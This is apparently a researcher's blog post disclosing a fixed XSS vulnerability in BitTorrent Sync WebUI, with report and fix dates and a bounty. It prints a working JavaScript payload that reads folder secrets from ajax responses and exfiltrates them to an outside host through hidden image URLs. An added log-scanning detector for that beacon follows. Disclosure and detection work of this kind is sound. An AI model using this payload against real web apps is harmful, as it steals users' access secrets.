Monday, December 29, 2014

BitTorrent Sync WebUI XSS vulnerability

BitTorrent Sync WebUI (<= 1.4.92) is affected by an XSS vulnerability that could be exploited in some rare scenarios.

Proof of concept video (stealing secrets):

The PoC exploit uses jQuery's global ajax hook (the jQuery library is already used in the WebUI) to fetch the necessary data (secrets in our case) directly from internal ajax responses instead of parsing the DOM.

Sample payload:
fakeImgUrl = 'http://cinu.pl/research/btsync/webui-xss/image/';
folders = [];

// ajax hook - all data is there
$(document).ajaxComplete(function(event, xhr, settings) {
 try {
  json=$.parseJSON(xhr.responseText);

  for(var i in json.folders) {
   var str=encodeURIComponent(json.folders[i].secret+':'+json.folders[i].path+':'+json.folders[i].status);

   if (folders.indexOf(str)==-1) {
    folders.push(str);
    $('body').append('<img style=\'display:none\' src=\''+fakeImgUrl+'?'+str+'\'>');
    console.log('SEND ' + str);
   }
  }
 } catch (e) {
  // error
  return;
 }
});
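
On the detection side, the image beacon in the payload above leaves a recognisable request shape: a GET whose whole query string is one URL-encoded secret:path:status value. The following is an added example, not part of the original post; the log format, the collector.example host, the sample lines and the assumed secret alphabet (20+ uppercase letters/digits) are constructed for illustration.

```javascript
// Added example: flag proxy-log requests shaped like the PoC's image beacon,
// i.e. GET <url>?<encodeURIComponent("secret:path:status")>.
// Assumed log format: "<time> <client> <method> <url>"; secret pattern is an assumption.
const SECRET_RE = /^[A-Z0-9]{20,}$/;

function parseBeacon(url) {
  let query;
  try {
    query = new URL(url).search.slice(1);
  } catch (e) {
    return null; // not an absolute URL
  }
  // The payload appends one bare encoded value, so there is no key=value pair.
  if (!query || query.includes('=') || query.includes('&')) return null;
  let decoded;
  try {
    decoded = decodeURIComponent(query);
  } catch (e) {
    return null; // malformed percent-encoding, cannot be the beacon
  }
  const first = decoded.indexOf(':');
  const last = decoded.lastIndexOf(':');
  if (first === -1 || first === last) return null; // need at least three fields
  const secret = decoded.slice(0, first);
  if (!SECRET_RE.test(secret)) return null;
  // The path may itself contain ':' (e.g. a Windows drive letter), so split on
  // the first and last separators only.
  return { secret, path: decoded.slice(first + 1, last), status: decoded.slice(last + 1) };
}

function findBeaconExfil(logLines) {
  const hits = [];
  for (const line of logLines) {
    const [time, client, method, url] = line.trim().split(/\s+/);
    if (method !== 'GET' || !url) continue;
    const beacon = parseBeacon(url);
    if (beacon) hits.push({ time, client, host: new URL(url).host, ...beacon });
  }
  return hits;
}

// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  '2014-10-15T10:00:01Z 10.0.0.5 GET http://collector.example/image/?AEXAMPLESECRET0000000000000000000%3AC%3A%5CUsers%5Cbob%5CSync%3A0',
  '2014-10-15T10:00:02Z 10.0.0.5 GET http://cdn.example/logo.png?v=3',
  '2014-10-15T10:00:03Z 10.0.0.5 GET http://cdn.example/a.png?%E0%A4%A',
  '2014-10-15T10:00:04Z 10.0.0.7 GET http://collector.example/image/?AEXAMPLESECRET1111111111111111111%3A%2Fhome%2Fal%2Fsync%3A1',
];
```

Calling findBeaconExfil(SAMPLE_LOG) returns the first and last sample lines; the versioned asset request and the malformed percent-encoding are skipped.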

I also found a minor XSS on https://link.getsync.com/#f=XSS_HERE

Reported: 15.10.2014
Fixed: 16.10.2014
Unexpected surprise bounty: 500 USD
